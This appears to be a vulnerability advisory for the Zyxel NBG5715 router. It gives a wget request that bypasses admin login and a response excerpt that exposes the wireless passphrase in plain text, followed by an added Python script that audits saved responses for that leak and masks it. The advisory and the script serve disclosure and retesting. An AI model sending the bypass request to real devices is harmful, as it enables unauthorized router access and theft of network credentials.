Zyxel NBG5715 Local admin privileges bypass Vulnerability



EKU-ID: 3250 CVE: OSVDB-ID:
Author: drwxrwxrwx Published: 2013-06-03 Verified: Verified


==================================================================================================
    | |                                                                  
  __| | _ __ __      ____  __ _ __ __      ____  __ _ __ __      ____  __
 / _` || '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /
| (_| || |    \ V  V /  >  < | |    \ V  V /  >  < | |    \ V  V /  >  < 
 \__,_||_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\
==================================================================================================
Zyxel NBG5715
Simultaneous Dual-Band Wireless N900 Media Router
Local admin privileges bypass and Local Wireless Plain Text Password Disclosure
Firmware Version Affected: NBG5715_1.00
Release Date: 20 November 2012
Discovered by: drwxrwxrwx <drwxrwxrwx@linuxmail.org>
Vendor: ZyXEL
Products Affected: NBG5715

==================================================================================================
VULN: Local admin privileges bypass via wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap#
==================================================================================================
DATA:

<title>.::Welcome to ZyXEL NBG5715::.</title>

	with ( document.forms[0] ){
		/* 2.4G */
		if(wlanRadio.selectedIndex == 0){
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		else{ /* 5G */
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		changeSec();
	}
}
==================================================================================================
Gretz
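
To check whether a response body from the device still embeds the wireless passphrase (for example when retesting after a firmware change), the following added example, which is not part of the original advisory, scans a saved body for the `wlanSSID` and `wlanPwd` assignments shown in the DATA excerpt and reports them per band with the passphrase masked. The function names and the sample body are constructed for illustration.

```python
import re

# Constructed sample: a response body shaped like the DATA excerpt in this advisory.
SAMPLE_BODY = '''<title>.::Welcome to ZyXEL NBG5715::.</title>
    with ( document.forms[0] ){
        /* 2.4G */
        if(wlanRadio.selectedIndex == 0){
            wlanSSID.value = "Defaultssid";
            wlanSec.selectedIndex = 2;
            wlanPwd.value = "thedefaultpassword";
        }
        else{ /* 5G */
            wlanSSID.value = "Defaultssid";
            wlanSec.selectedIndex = 2;
            wlanPwd.value = "thedefaultpassword";
        }
        changeSec();
    }
'''

# Field names and band comments are taken from the advisory's DATA excerpt.
BAND = re.compile(r'/\*\s*(2\.4G|5G)\s*\*/')
FIELD = re.compile(r'\b(wlanSSID|wlanPwd)\.value\s*=\s*"((?:[^"\\]|\\.)*)"')


def mask(secret):
    """Keep only the first character and the length so the report leaks nothing."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else ""


def audit_body(body):
    """Return one finding per band whose passphrase appears in clear text in body."""
    findings, band, current = [], "unknown", {}
    # Walk band markers and field assignments in document order.
    tokens = sorted(
        [(m.start(), "band", m.group(1), None) for m in BAND.finditer(body)]
        + [(m.start(), "field", m.group(1), m.group(2)) for m in FIELD.finditer(body)]
    )
    for _, kind, name, value in tokens:
        if kind == "band":
            band, current = name, {}
        elif name == "wlanSSID":
            current["ssid"] = value
        elif value:  # non-empty wlanPwd: the passphrase is disclosed
            findings.append({"band": band, "ssid": current.get("ssid"),
                             "passphrase_masked": mask(value), "length": len(value)})
    return findings
```

An empty list from `audit_body` means the body carries no plaintext `wlanPwd` value; any finding means the page handed out the passphrase to whoever requested it.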